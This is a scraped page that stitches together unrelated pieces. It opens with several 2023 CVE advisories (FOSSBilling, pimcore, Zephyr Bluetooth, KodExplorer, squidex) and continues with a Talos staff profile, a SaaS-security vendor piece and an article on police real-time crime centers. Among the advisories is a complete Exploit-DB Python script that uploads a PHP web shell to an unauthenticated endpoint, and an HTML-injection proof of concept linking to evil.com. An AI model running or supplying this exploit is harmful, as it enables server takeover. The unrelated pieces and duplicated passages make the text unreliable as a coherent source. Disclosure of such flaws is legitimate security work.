Improper Input Validation in GitHub repository fossbilling/fossbilling prior to 0.5.4.

**Description**

FOSSBilling suffers from a lack of sanitization in the handling of admin input values. This issue manifests when clients attempt to generate invoices for their orders. Specifically, in the PDF generation of invoices, the company name, editable through the admin portal, is included. An attacker with administrative access could exploit this vulnerability by inserting a malicious link within the company name field. Consequently, this alteration would impact every client, potentially leading to an open redirect vulnerability.

**Proof of Concept**

    <a href=https://evil.com>CLick here</a>
    

**Steps:**

1.  Log in to the application utilizing the administrator credentials.
2.  Access the URL: http://172.17.0.2/admin/extension/settings/system.
3.  Modify the company name to "<a href=https://evil.com>Click here</a>" and save the changes.
4.  Now, Proceed to log in as any client.
5.  Place an order for a specific domain.
6.  Navigate to the invoice section and click on the PDF option.
7.  Observe that the previously injected malicious HTML code is rendered within the PDF document.

> This sequence of actions reveals a critical vulnerability in the application, whereby an attacker with administrative privileges can exploit the lack of input sanitization. By injecting a malicious link into the company name field, the compromised HTML code propagates throughout the software, affecting all clients. Consequently, when generating invoices in PDF format, the malicious HTML code is rendered, potentially leading to various security risks and exposing users to the attacker's intended actions.

**Impact**

1.  Malware Distribution: The attacker may utilize the injected HTML code to deliver malicious payloads or initiate drive-by downloads. This can result in the installation of malware on the client's system, leading to potential data breaches, system compromise, or further propagation of malware within the network.
2.  Brand Reputation Damage: If customers or clients receive invoices containing the injected HTML code, it can erode trust and damage the reputation of the affected organization. Such incidents may lead to financial losses, loss of business opportunities, and a negative impact on customer loyalty.
3.  Open Redirect Vulnerability: The bug also introduces an open redirect vulnerability, enabling the attacker to redirect users to arbitrary external websites. This can be exploited to conduct phishing attacks, deliver malware, or trick users into unknowingly visiting malicious pages that exploit additional vulnerabilities.
4.  Phishing Attacks: The injected HTML code can contain phishing links, redirecting users to malicious websites that mimic legitimate ones. This can trick unsuspecting users into providing their login credentials, personal information, or financial details, thereby facilitating identity theft, fraud, or further exploitation.

**Occurrences**

Service.php L156

the 'name' parameter does not have any mitigation for HTML tags

CVE-2023-3568: Fossbilling is Vulnerable to HTML Injection During the Generation of Invoices, Which Leads To An Open Redirect Vulnerability. in fossbilling

Improper Authorization in GitHub repository pimcore/customer-data-framework prior to 3.4.1.

**Description**

The product performs authorization checks incorrectly when an unauthorized actor tries to access a resource or perform an actions.

**Proof of Concept**

The user does not have permission to delete the rule. 

**Location**

*   GET /admin/customermanagementframework/rules/list
*   POST /admin/customermanagementframework/rules/add
*   PUT /admin/customermanagementframework/rules/save
*   DELETE /admin/customermanagementframework/rules/delete

**Image**

https://drive.google.com/drive/folders/1bSCkTQtcGhtdzRjKGD3KIA-8Kx3a406u?usp=sharing

**Impact**

The attacker can view and freely perform actions to add, modify, or delete rules.

CVE-2023-3574: Improper Authorization in "Customer automation rules" function in customer-data-framework

The bluetooth HCI host layer logic not clearing a global reference to a semaphore after synchronously sending HCI commands may allow a malicious HCI Controller to cause the use of a dangling reference in the host layer, leading to a crash (DoS) or potential RCE on the Host layer.




**Summary**

The bluetooth HCI host layer logic not clearing a global reference to a semaphore after synchronously sending HCI commands may allow a malicious HCI Controller to cause the use of a dangling reference in the host layer, leading to a crash (DoS) or potential RCE on the Host layer.

**Description**

To send an HCI command synchronously, the HCI stack involves different functions for its synchronization:

1.  bt_hci_cmd_send_sync creates a local semaphore variable (which gets allocated on the stack of bt_hci_cmd_send_sync) and stores a reference to this local semaphore variable in the global cmd_data array via cmd(buf)->sync: https://github.com/zephyrproject-rtos/zephyr/blob/9a75902/subsys/bluetooth/host/hci\_core.c#L325
2.  hci_cmd_done, which is called while handling sending completion (via the reception of matching completion or status priority HCI events, or in certain error cases), checks whether the reference to this synchronization semaphore is set, and optionally giving/releasing the semaphore: https://github.com/zephyrproject-rtos/zephyr/blob/9a75902/subsys/bluetooth/host/hci\_core.c#L2102
3.  To support asynchronous sending, bt_hci_cmd_create initializes cmd(buf)->sync to NULL while a command buffer is initially created.

The issue of this way of handling synchronous sending of HCI commands lies in the fact that while handling the completion, the reference to the synchronization semaphore is not cleared (hci_cmd_done uses cmd(buf)->sync, but never clears the reference).

This implementation works correctly as long as the HCI Controller layer always sends completion/status priority events only once for each synchronously-sent command, or delays sending it enough such that the corresponding command buffer is correctly re-initialized and the semaphore reference is valid again.

The implementation causes a stale reference to the application stack memory to be used as a semaphore, however, if the Controller layer sends a second completion event for the same command before it is re-initialized for sending a new HCI command. In this situation, the pointer stored in cmd(buf)->sync has first been used as expected, and indicated to bt_hci_cmd_send_sync that the transmission is completed. As a result, bt_hci_cmd_send_sync returns and releases its local variables in the process. Another function re-claims the stack space for its own local variables, and overwrites the contents in the location which cmd(buf)->sync still references. When the second completion event is sent by the malicious/malfunctioning Controller layer, the reference stored in cmd(buf)->sync still references the invalidated stack memory, such that this reference is used via k_sem_give(cmd(buf)->sync); (https://github.com/zephyrproject-rtos/zephyr/blob/9a75902/subsys/bluetooth/host/hci\_core.c#L2104). In this situation, arbitrary data may reside in the affected memory location (which may or may not be attacker-controllable), and may be wrongly used as a pointer to a k_sem structure in a call to k_sem_give.

**Impact**

A malicious / malfunctioning HCI Controller may cause a dangling reference to be used as a semaphore object in the host layer, resulting in a crash (DoS) or potential Remote Code Execution (RCE) on the Bluetooth host layer.

**Proposed Fix**

To avoid this issue, when receiving HCI responses to synchronously sent HCI commands (cmd(buf)->sync is not NULL), the HCI logic should ensure that the semaphore reference in cmd(buf)->sync is (atomically) cleared and will not be re-used while handling another HCI response.

For example, hci_cmd_done could (atomically) read cmd(buf)->sync and NULL the reference after retrieving it.

**For more information**

If you have any questions or comments about this advisory:

*   Open an issue in zephyr
*   Email us at Zephyr-vulnerabilities

embargo: 2023-07-04

CVE-2023-1901: HCI send_sync Dangling Semaphore Reference Re-use

The bluetooth HCI host layer logic not clearing a global reference to a state pointer after handling connection events may allow a malicious HCI Controller to cause the use of a dangling reference in the host layer, leading to a crash (DoS) or potential RCE on the Host layer.

**Summary**

The bluetooth HCI host layer logic not clearing a global reference to a state pointer after handling connection events may allow a malicious HCI Controller to cause the use of a dangling reference in the host layer, leading to a crash (DoS) or potential RCE on the Host layer.

**Description**

To handle connection state, the HCI stack involves different functions:

1.  bt_le_create_conn_ext / bt_le_create_conn_legacy: these functions create a local struct bt_hci_cmd_state_set state variable. They call bt_hci_cmd_state_set_init to store a reference to this local state variable in the global cmd_data array via cmd(buf)->state = state;: https://github.com/zephyrproject-rtos/zephyr/blob/9a75902/subsys/bluetooth/host/hci\_core.c#L685 / https://github.com/zephyrproject-rtos/zephyr/blob/9a75902/subsys/bluetooth/host/hci\_core.c#L123
2.  hci_cmd_done, which is called while handling sending completion (via the reception of matching completion or status priority HCI events, or in certain error cases), checks whether the reference to the state is set, and optionally updating the state accordingly: https://github.com/zephyrproject-rtos/zephyr/blob/9a75902/subsys/bluetooth/host/hci\_core.c#L2095
3.  To support non-connection related sending, bt_hci_cmd_create initializes cmd(buf)->state to NULL while a command buffer is initially created.

The issue of this way of handling connection state within HCI commands lies in the fact that while handling the completion, the reference to the state structure is not cleared (hci_cmd_done uses cmd(buf)->state, but never clears the reference).

This implementation works correctly as long as the HCI Controller layer always sends completion/status priority events only once for each connection-related command, or delays sending it enough such that the corresponding command buffer is correctly re-initialized and the state struct reference is valid again.

The implementation causes a stale reference to the application stack memory to be used as a struct bt_hci_cmd_state_set, however, if the Controller layer sends a second completion event for the same command before it is re-initialized for sending a new HCI command. In this situation, the pointer stored in cmd(buf)->state has first been used as expected, and indicated to bt_le_create_conn_ext / bt_le_create_conn_legacy calling bt_hci_cmd_send_sync that the transmission is completed. As a result, bt_le_create_conn_ext / bt_le_create_conn_legacy return and release their local variables in the process. As other functions get called, they re-claim the stack space for their own local variables, and overwrite the contents in the location which cmd(buf)->state still references. When the second completion event is sent by the malicious/malfunctioning Controller layer, the reference stored in cmd(buf)->state still references the invalidated stack memory, such that this reference is involved in a write operation via atomic_set_bit_to(state->target, state->bit, state->val); (https://github.com/zephyrproject-rtos/zephyr/blob/9a75902/subsys/bluetooth/host/hci\_core.c#L2098). In this situation, arbitrary data may reside in the affected memory location (which may or may not be attacker-controllable). As a result, a now corrupted (and potentially attacker-controlled) pointer state->target is used in a write operation.

**Impact**

A malicious / malfunctioning HCI Controller may cause a dangling reference to be used as a pointer in a write operation in the host layer, resulting in a crash (DoS) or Remote Code Execution (RCE) on the Bluetooth host layer.

**Proposed Fix**

To avoid this issue, when receiving HCI responses to synchronously sent HCI commands (cmd(buf)->state is not NULL), the HCI logic should ensure that the state structure reference in cmd(buf)->state is (atomically) cleared and will not be re-used while handling another HCI response.

For example, hci_cmd_done could (atomically) read cmd(buf)->state and NULL the reference after retrieving it.

**For more information**

If you have any questions or comments about this advisory:

*   Open an issue in zephyr
*   Email us at Zephyr-vulnerabilities

embargo: 2023-07-04

CVE-2023-1902: HCI Connection Creation Dangling State Reference Re-use

KodExplorer 4.51 contains a Cross-Site Scripting (XSS) vulnerability in the Description box of the Light App creation feature. An attacker can exploit this vulnerability by injecting XSS syntax into the Description field.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-37153: XSS_vuln_issue/KodExplorer4.51.03.md at main · Trinity-SYT-SECURITY/XSS_vuln_issue

Improper Handling of Additional Special Element in GitHub repository squidex/squidex prior to 7.4.0.

**Description**

Html injection in Contributors and just only need html payload in Display Name and fire in Contributors list

**Proof of Concept**

    1. Login to squidex 
    2. Create an app with random name.
    2. Go to Edit Profile then Edit users display name with html payload = <h1>Sanket_722</h1>
    3. Go to https://localhost/app/{App/Random Name}/settings/contributors 
    For Full understanding check POC : https://drive.google.com/file/d/1W8KdHgQKBRvRDKbNnPvrv9fYWItI9gQa/view?usp=sharing
    // PoC.js
    var payload = <h1>Sanket_722</h1>
    

**Impact**

inert html character in Contributors list and change response with special character

CVE-2023-3580: Html Injection in Contributors in squidex

Projectworlds Online Art Gallery Project 1.0 allows unauthenticated users to perform arbitrary file uploads via the adminHome.php page.

    # Exploit Title: Online Art gallery project 1.0 - Arbitrary File Upload (Unauthenticated)
    # Google Dork: n/a
    # Date: 14/06/2023
    # Exploit Author: Ramil Mustafayev
    # Vendor Homepage: https://github.com/projectworldsofficial
    # Software Link: https://github.com/projectworlds32/Art-Gallary-php/archive/master.zip
    # Version: 1.0
    # Tested on: Windows 10, XAMPP for Windows 8.0.28 / PHP 8.0.28
    # CVE : n/a
    
    # Vulnerability Description:
    #
    # Online Art Gallery Project 1.0 allows unauthenticated users to perform arbitrary file uploads via the adminHome.php page. Due to the absence of an authentication mechanism and inadequate file validation, attackers can upload malicious files, potentially leading to remote code execution and unauthorized access to the server.
    # Usage: python exploit.py http://example.com
    
    import requests
    import sys
    
    def upload_file(url, filename, file_content):
        files = {
            'sliderpic': (filename, file_content, 'application/octet-stream')
        }
    
        data = {
            'img_id': '',
            'sliderPicSubmit': ''
        }
        url = url+"/Admin/adminHome.php"
        try:
            response = requests.post(url, files=files, data=data)
        except:
            print("[!] Exploit failed!")
        
    if __name__ == "__main__":
        if len(sys.argv) < 2:
            print("Usage: python exploit.py <target_url>")
            sys.exit(1)
    
        target_url = sys.argv[1]
        file_name = "simple-backdoor.php"
        file_content = '<?php system($_GET["c"]);?>'
    
        upload_file(target_url, file_name, file_content)
        print("[+] The simple-backdoor has been uploaded.\n Check following URL: "+target_url+"/images/Slider"+file_name+"?c=whoami")

CVE-2023-37152: OffSec’s Exploit Database Archive

Karadzhova-Dangela's family put her on a plane to Massachusetts without a return ticket and it wasn't until the IT job gave her enough disposable income to afford plane tickets back and forth to Bulgaria that she could see her family.

Monday, July 10, 2023 08:07

Gergana Karadzhova-Dangela is used to being with users during some of their toughest moments.

Today, she spends much of her time responding to active cybersecurity incidents with Cisco Talos Incident Response, helping customers work through active attacks, many of which put personal data or sensitive information at risk.

And while admittedly less high stakes, her first job in IT at Mount Holyoke College in a small town in Massachusetts prepared her for this.

There, she had an information technology support job with the college where she would help service students’ computers — many showed up in tears worried they’d lost the entirety of an important project or paper.

“It was 2008, back then, cloud was not as prevalent,” Karadzhova-Dangela said in a recent interview. “So if your laptop crashed, you were in trouble. We’d try to save the paper if possible and help them reset and get on their way.”

A decade-plus later, she had no idea she’d be working with Talos IR, let alone living in Switzerland. She was born and raised in Bulgaria, and her first time out of the country was to attend Mount Holyoke College and take that IT support job while she completed her bachelor’s degree in German and Russian studies.

Karadzhova-Dangela's family put her on a plane to Massachusetts without a return ticket and it wasn't until the IT job gave her enough disposable income to afford plane tickets back and forth to Bulgaria that she could see her family. Still, the opportunity to attend college in the US was nothing short of a miracle in her life. Her mother worked as a babysitter in the U.S. when she was younger and told Karadzhova-Dangela stories about America, which made her want to go to school there and explore the broader world.

While in undergrad, she studied abroad for a year in Potsdam, Germany and traveled to Poland, France and England. All that travel pays off today when she’s working with a global client base — she can speak six languages, though she jokes that she can only speak “a little bit of French.”  

Back home in Bulgaria after graduation, she started considering a career in data analytics, so she returned to school in Germany. While there, she became interested in cybercrime and using data analytics and digital footprints to track bad actors, which eventually brought her to Talos IR as a consultant.

“I was 26 when I started \[the digital forensics collegiate\] program, and I remember telling my friends and they were all like, ‘Oh my God, you’re going to be 31 when you graduate,’” she said. “With the learner that I am, I knew I’d need a structure to gain these skills, so a traditional degree was the right path for me.”

Many of the interpersonal skills any IR professional needs she had to learn on the fly — but it came naturally coming from a large family in Bulgaria where she was used to having a large support system.

“You grow up empathetic with a large family,” she said. “And in college, I had to write a lot, I had to present a lot and learn to just be a communicator.”

These are all important skills when you’re in a high-pressure cybersecurity incident, she says, especially when she’s working on-call. During these stretches, she said she has no control over how her “average day” looks because she’s answering questions on the fly from the customer or working with the customers’ team in the trenches to resolve the incident as quickly as possible.

“\[Customers\] have so many projects going on at the same time, and defenders have limited resources for these projects,” she said. “So, they’re being overwhelmed by the tasks they have in front of them. There’s so much awareness of the risks involved in cybersecurity but only so many resources to dedicate to those risks.”

Karadzhova-Dangela sees first-hand how few women are in the cybersecurity and IR fields, so now that she’s established in her career, she wants to empower other women to enter the field. She spends a lot of her time outside of the office working with non-profit organizations and events that specifically cater to females and other populations with limited resources to teach them security skills.

Part of this is using Cisco’s “Time2Give” program which enables employees to take time off from work to help the various non-profits and causes they support.

In early June, Karadzhova-Dangela and Yuri Kramarz, her IR colleague, hosted a “Discover Cyber Workshop for Women” along with Cisco Qatar and the University of Doha for Science and Technology. Just a week later, a similar workshop took place in Berlin in cooperation with ReDI School of Digital Integration. Both workshops gathered several speakers from the security field to share their stories and encourage women to enter the field.

_Karadzhova-Dangela and fellow IR colleague, Harpreet Singh, at ReDI School of Digital Integration in Berlin, where they taught a month-long class in networking foundations class to underprivileged students._

“Women of various backgrounds come to the Discover Cyber Workshops to hear stories from real cybersecurity professionals. The good, the bad and the ugly truth about working in the field. Then they can think about if it’s a good professional path for them,” she said.

Karadzhova-Dangela is also part of the internal Cisco Women in Cybersecurity Community where she’s leading the pillar responsible for bringing more women into the field.

“In general, I really love teaching. And so few women consider cybersecurity as a career, or they just don’t have contacts with other women in security,” Karadzhova-Dangela said. “But I try to tell them that the work is interesting, you’re surrounded by smart and cool people, and you’re always working toward a better society.”

It’s that aspect of helping people that drives Karadzhova-Dangela into the next phase of her IR career. The incident that she feels most proud of is an active attack against a public agency in Germany that “could have potentially affected millions of people.”

After spending many years studying there — and having a husband who’s German — Karadzhova-Dangela said it was personally important to her to help resolve the issue.

“Being able to be a part of this group effort to help this customer get back on their feet, and help citizens, for me it was very meaningful,” she said.

If your organization would like to work with Gergana or one of her fellow Talos IR team members, you can reach out to them here. Talos Incident Response offers a range of proactive services for security teams, including hands-on tabletop exercises, a state-of-the-art cyber range for training and much more.

Gergana Karadzhova-Dangela wants to send the ladder back down to the next generation of incident responders

Brick-and-mortar retailers and e-commerce sellers may be locked in a fierce battle for market share, but one area both can agree on is the need to secure their SaaS stack. From communications tools to order management and fulfillment systems, much of today's critical retail software lives in SaaS apps in the cloud. Securing those applications is crucial to ongoing operations, chain management,

Brick-and-mortar retailers and e-commerce sellers may be locked in a fierce battle for market share, but one area both can agree on is the need to secure their SaaS stack. From communications tools to order management and fulfillment systems, much of today's critical retail software lives in SaaS apps in the cloud. Securing those applications is crucial to ongoing operations, chain management, and business continuity.

Breaches in retail send out seismic shockwaves. Ten years later, many still remember one national retailer that had 40 million credit card records stolen. Those attacks have continued. According to Verizon's Data Breach Investigations Report, last year saw 629 cybersecurity incidents in the sector. Clearly, retailers must take concrete steps to secure their SaaS stack.

And yet, securing applications is complicated. Retailers tend to have multiple tenants of apps, which leads to confusion over which instances of the application were already secured and which are vulnerable to attack. They also have high employee turnover rates, and must quickly deprovision employees as they move on to other opportunities.

**Learn how you can secure your entire SaaS stack with an SSPM solution.**

**Multiple App Instances**

Retailers tend to use multiple tenants of the same app to manage different regions within the chain and different product lines across the chain. Consider a scenario where a retailer has fifty different instances of their CRM or ticketing system. Each tenant must be independently secured, following the retailer's guidelines.

While some instances of that application are undoubtedly secure, others present themselves more as a black hole, where no one in the company really knows what's happening. Some instances may have SSO, require MFA, and provide limited role-based access, while other instances may allow all users to login locally with only a single factor.

**A Wrench in Operations**

When most organizations discuss SaaS security, the concern is on protecting data. While that holds true for retailers as well, many retailers have tied their operations to SaaS apps. ServiceNow has reimagined retail experience, enabling retailers to better solve issues, manage their supply chains, and streamline operations.

Risks in apps like these would be catastrophic for a retailer. They could lose visibility and control of their entire supply chain, ordering system, and franchise support platform. This isn't an inconvenience; now that many retailers have completed their digital transformation they must make securing the applications powering operations a top priority.

**Controlling Access Governance in a High Turnover Industry**

According to the US Chamber of Commerce, nearly 70% of all retail jobs are unfilled, and surveys indicate that 74% of retail workers are planning to switch jobs this year. Those numbers indicate a transient workforce that needs rapid onboarding and even faster deprovisioning from company SaaS applications.

Many of these processes are automated. However, SaaS applications that are not integrated with the company's Identity Provider (IdP) software retain the employee's access to those apps. Additionally, employees with local access to apps often lose the ability to login with SSO but are still able to directly enter applications.

As part of any retail SaaS security program, attention must be paid to former employees. Revoking access immediately helps reduce the likelihood of data leaks, breaches, and other cyber attacks.

**Protecting the Full Retail SaaS Stack**

**SaaS Security Posture Management** (SSPM) enables companies to quantify the risk to their SaaS applications and take the steps needed to secure the stack. SSPMs monitor each tenant of an application independently in one single pane of glass, enabling security teams to identify under-protected applications and take the steps needed to prevent unauthorized access. To further enhance security, SSPMs help users find the most secure tenant and use it as a baseline for securing the other tenants.

SSPMs also monitor users. It can search users to identify those that need to be deprovisioned, and guide the security team on how to best remove access. Meanwhile, SSPMs threat detection capabilities can issue an alert when threat actors have breached the application.

By implementing an SSPM program, retailers can control and protect their SaaS stack, and take advantage of the benefits that come from their digital transformation.

**Get a 15-minute to learn how to secure your entire stack.**

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Global Retailers Must Keep an Eye on Their SaaS Stack

Cities across the US have established RTCCs that police say protect the rights of innocent people, but critics warn of creeping surveillance.

In the 1990s, London built the Ring of Steel—a network of concrete barriers, checkpoints, and thousands of video cameras around the historic City of London—after bombings by the Irish Republican Army. The idea was to monitor everyone entering and leaving the Square Mile, what the _The New York Times_ later called “fortress urbanism.”

After the September 11, 2001, attacks, city planners looking to defend New York from terrorism turned to London and fortress urbanism for inspiration. Fusion centers, where US law enforcement agencies share intelligence at a federal level to be analyzed and build a bigger picture of crime, had been around for a few years. But officials began asking, what if fusion centers could be localized? What if local law enforcement could analyze and gather masses of intelligence from one city?

In 2005, they answered with the first “real-time crime center” (RTCC), a sprawling network of CCTV and automatic license plate readers (ALPR) linked to a central hub in the New York Police Department headquarters costing $11 million. Since then, from Miami to Seattle, RTCCs have steadily expanded across the US. The Atlas of Surveillance, a project from the digital rights nonprofit the Electronic Frontier Foundation (EFF), which monitors police surveillance technology, has counted 123 RTCCs nationwide—and that number is rising.

Each RTCC is slightly different, but their function is the same: gather surveillance data across a city and use that to build a live picture of crime in the city. Police departments have an array of technologies available to them that span from CCTV, gunshot sensors, and social media monitoring to drones and body cameras. In Ogden, Utah, police even floated the idea of a 30-foot “crime blimp.” In many cases, images that police systems collect are run through facial recognition technology, and the data gathered is often used in predictive policing. In Pasco County, Florida, which operates an RTCC, the sheriff’s office’s predictive policing system encouraged officers to continuously monitor and harass residents for minor code violations such as missing mailbox numbers and overgrown grass.

Erik Lavigne is a detective at the Fort Worth Police Department in Texas and communications director at the National RTCC Association. He says there has been a boom in RTCCs over the past year because officers believe they help with more precise policing. He likens the scattered approach to policing in previous years to throwing out a fishnet and hoping to catch something. “For what we had at the time, that worked. But what inevitably happens is, you end up alienating the community because you're not just stopping the bad guys, you're also stopping innocent people that are just trying to live their lives,” he says. “A real-time crime center is a scalpel. We aren't catching the wrong people anymore.”

Lavigne says RTCCs are also a cheaper alternative to hiring more boots on the ground because each camera becomes, in effect, a stationary officer keeping watch over an area. Lavigne says this has proved so effective that analysts at RTCCs have been recording more crime than they can deal with, and  the Fort Worth RTCC has significantly helped decrease vehicle thefts.

Most evidence for RTCC effectiveness, however, is anecdotal, and there is a real lack of studies into how effective they really are. In Detroit, a National Institute of Justice study concluded that Project Green Light—a part of the Detroit Police Department RTCC that established cameras at more than 550 locations, including schools, churches, private businesses, and health centers—helped decrease property violence in some areas but did nothing to prevent violent and other crimes. But police departments argue they do work.

Few people know RTCCs even exist, let alone the extent of the surveillance they entail, so they can receive little public scrutiny and often operate without much oversight. There have long been concerns around how surveillance technologies could affect First and Fourth Amendment rights in the US, but Beryl Lipton, an investigative researcher at the EFF, says RTCCs “hyper-charge” these worries by collating all this data in one place.

“It’s perpetuating this mass collection of people's private information from a whole bunch of different video streams,” Lipton says. “They're really lowering the bar on the ways police can access that information … When there are these types of large databases without proper audit and oversight mechanisms, law enforcement officials and individuals can use them for their own purposes, which can be very scary.”

Regulations around the storage and usage of this data are patchy at best. For example, RTCC-collected data may be shared across jurisdictions because third parties contracted for the hardware or software will also collect data and share it, Lipton says. “Some of these companies will, in good faith, delete data in accordance with retention schedules, but we've seen them not do that,” she says. “With large databases like license plate reader databases, that information is sometimes shared without police departments realizing it and in violation of jurisdictional rules.”

While companies will argue this data is being stored securely, this is no guarantee. In 2020, hackers stole internal memos, financial records, and more from over 200 local, state, and federal agencies from web development firm Netsential, which provided data storage for fusion centers across the US. The trove of leaked data later became known as #BlueLeaks.

“There are real concerns around having this amount of information stored somewhere,” says Lipton, “I have no reason to believe these are somehow more secure systems than we have in other situations. And we know that those get breached all the time, law enforcement agencies in this country get hacked all the time.”

Lipton’s biggest worry is that this ability to follow people remotely and share that data across state lines could instead be used to target people involved in protests and political organizing, which has already happened, or those accessing reproductive health care. “Those issues become compounded because there’s the frightening ‘real time’ element to it,” she says. “That means that if you leave your house, there’s a very good chance that law enforcement could jump into a feed that is just following you around.”

In addition to police setting up their own technology, RTCCs draw on wider existing surveillance networks. Cooperation of public institutions like schools and colleges and privately owned cameras have been crucial to developing RTCCs by giving officers access to cameras that might otherwise need a warrant. In Atlanta, which has seen the number of cameras integrated into their RTCC treble to 15,329 in the past year, four higher-education institutions—Clark Atlanta University, Spelman College, Morehouse College, and the Morehouse School of Medicine—installed $700,000 worth of cameras, including five ALPRs, that were linked to the Atlanta RTCC.

Fusus, which claims to be “the most widely used & trusted Real-Time Crime Center platform in U.S. Public Safety,” sells hardware that can be connected to private CCTV cameras and linked up to the local RTCC. Fusus sells a solution that brings all the various technologies under “a single pane of glass,” as the company describes it. Through partnerships with companies that provide surveillance technology, including a $21 million investment from Axon, which produces Tasers and body cams, Fusus promises to integrate these technologies into one RTCC platform for analysts.

Police departments that use Fusus, like the Memphis Police Department, have been encouraging homeowners and local businesses to purchase fususCORE bundles—hardware that connects cameras to an RTCC—ranging from $350 to $7,300, plus an annual $150 subscription. Fusus has even gone as far as developing technology that allows Amazon’s Ring doorbells to livestream to an RTCC.

Amid a push for policing to harness new technologies and become “smarter,” Lipton is quick to point out that more technology doesn’t necessarily equal smarter. “It almost always just means that they're going to keep heavily policing poor and minority areas,” she says. Despite Lavigne’s claims that RTCCs mean the wrong people aren’t getting arrested anymore, in a recent lawsuit, the New Orleans Police Department was sued for arresting a Black man after watching him for 15 minutes through their RTCC and wrongly concluding he had a gun. The department ultimately settled for $10,000 in damages.

Lipton believes relentless surveillance is an infringement of citizens rights and would like to see the use of these technologies limited—aside from facial recognition, which she says should be banned. “There are certain elements we just shouldn't be using at all,” she says. “We should never be applying facial recognition to almost anything … As soon as you apply any really individualizing technology like that, I mean, it's kind of over for people's privacy.” Communities and organizations like EFF and ACLU have been arguing for Community Control Over Police Surveillance (CCOPS) laws that bring surveillance technologies under the control of elected officials and communities. Cities like Oakland have found success with this, but without nationwide restrictions, the rise of RTCCs will likely continue on the periphery of the public eye.

Tag

#git